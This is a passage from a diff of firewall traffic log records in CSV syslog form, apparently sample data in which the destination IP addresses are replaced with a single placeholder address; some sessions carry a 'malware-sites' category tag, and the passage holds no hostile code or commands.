04:39:54,24787,1,48412,443,0,0,0x0,tcp,allow,5817,804,5013,17,2012/04/10 04:39:24,0,computer-and-internet-security,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,10,7 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,65.55.223.19,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25948,1,47752,40026,0,0,0x200000,udp,allow,286,187,99,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.2,65.55.223.24,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25444,1,47752,40029,0,0,0x200000,udp,allow,978,76,902,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,8.8.8.8,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25349,1,52189,53,0,0,0x0,udp,allow,227,86,141,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25713,1,59300,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,26499,1,54414,53,0,0,0x200000,udp,allow,73,73,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25437,1,59299,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24848,1,60399,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24924,1,59626,53,0,0,0x200000,udp,allow,482,166,316,4,2012/04/10 04:39:22,1,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,2,2 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25899,1,51542,53,0,0,0x200000,udp,allow,196,75,121,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26066,1,54182,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24908,1,59199,80,0,0,0x200000,tcp,allow,1548,594,954,13,2012/04/10 04:39:23,0,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25105,1,59198,80,0,0,0x200000,tcp,allow,10135,1005,9130,22,2012/04/10 04:39:21,2,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,11964,1,56856,80,0,0,0x200000,tcp,allow,1918,1363,555,21,2012/04/10 04:29:51,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26502,1,52489,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26338,1,59298,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24919,1,60185,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26731,1,51817,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,65.55.223.31,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26504,1,47752,40043,0,0,0x200000,udp,allow,186,186,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25543,1,59297,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,21948,1,52537,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,26279,1,53155,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24894,1,59197,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:21,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24985,1,56995,53,0,0,0x200000,udp,allow,251,88,163,2,2012/04/10 04:39:22,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25380,1,59069,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24994,1,55697,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25451,1,59295,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:51,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,24866,1,59196,80,0,0,0x200000,tcp,allow,1500,578,922,13,2012/04/10 04:39:20,1,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26414,1,59291,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26131,1,52858,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26555,1,61383,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,15099,1,59290,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,8.5.1.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24980,1,59195,80,0,0,0x200000,tcp,allow,28096,1310,26786,39,2012/04/10 04:39:20,0,not-resolved,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,17,22 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26215,1,49812,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25881,1,50185,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24955,1,59286,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25572,1,54448,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26208,1,53121,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,14931,1,59323,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25544,1,59322,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,25308,1,55766,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,26376,1,55072,53,0,0,0x200000,udp,allow,74,74,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25118,1,59207,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,26146,1,59209,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:28,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,end,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25272,1,59208,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,24069,1,59318,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26161,1,59206,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26000,1,59205,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,65184,1,56858,80,0,0,0x200000,tcp,allow,1910,1359,551,21,2012/04/10 04:29:54,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26522,1,59314,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26067,1,59313,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26573,1,52139,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26894,1,60592,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25258,1,57322,53,0,0,0x200000,udp,allow,164,66,98,2,2012/04/10 04:39:26,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25025,1,59204,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26138,1,59203,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,27175,1,59305,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26261,1,64005,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25022,1,58768,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:17 1,2012/10/30 